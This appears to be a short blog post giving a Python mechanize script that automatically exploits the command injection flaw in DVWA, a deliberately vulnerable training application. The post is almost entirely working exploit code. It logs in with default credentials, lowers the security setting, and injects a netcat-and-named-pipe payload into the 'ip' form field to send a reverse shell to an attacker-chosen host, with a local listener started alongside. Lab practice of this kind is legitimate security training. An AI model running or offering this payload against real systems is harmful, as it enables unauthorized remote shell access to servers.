Damn Vulnerable Web Application (DVWA) is an intentionally vulnerable web application used for training. DVWA is also one of the web applications on the OWASP Broken Web Applications Virtual Machine. This post is nothing more than a script that automates the exploitation of the OS injection vulnerability using Python’s mechanize module for browser automation.
# Tested on Windows against DVWA within the OWASP Broken Web App VM Version 1.2 import mechanize import sys import os rhost = sys.argv[1] #IP address of target DVWA application lhost = sys.argv[2] #IP address of where you are catching the shell lport = sys.argv[3] #Port where you want to catch the shell def listener(): """Opens a command prompt and starts a netcat listener""" os.system(r'start cmd.exe /k "nc -lvp" ' + str(lport)) def browse_and_exploit(): """Logs into DVWA, sets security to low, and injects a payload""" br = mechanize.Browser() # create a browser object br.open("http://" + rhost + '/dvwa/login.php') # navigate to DVWA br.select_form(nr=0) # select the first (and only) form br.form['username']='admin' # fill in the login page br.form['password']='admin' br.submit() #submit the form br.open('http://' + rhost + '/dvwa/security.php') #opens the security page br.select_form(nr=0) #selects the form br.form['security'] = ["low"] # changes the security setting to low br.submit() br.open('http://' + rhost + '/dvwa/vulnerabilities/exec/') #open command injection page br.select_form(nr=0) # select the form # Uses netcat on the target server to shovel a shell back to the listener br.form['ip']='google.com && rm -f /tmp/backpipe && mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc %s %s 1>/tmp/backpipe' % (lhost,lport) br.submit() #submits the form and the shell should come def main(): listener() browse_and_exploit() if __name__ == '__main__': main()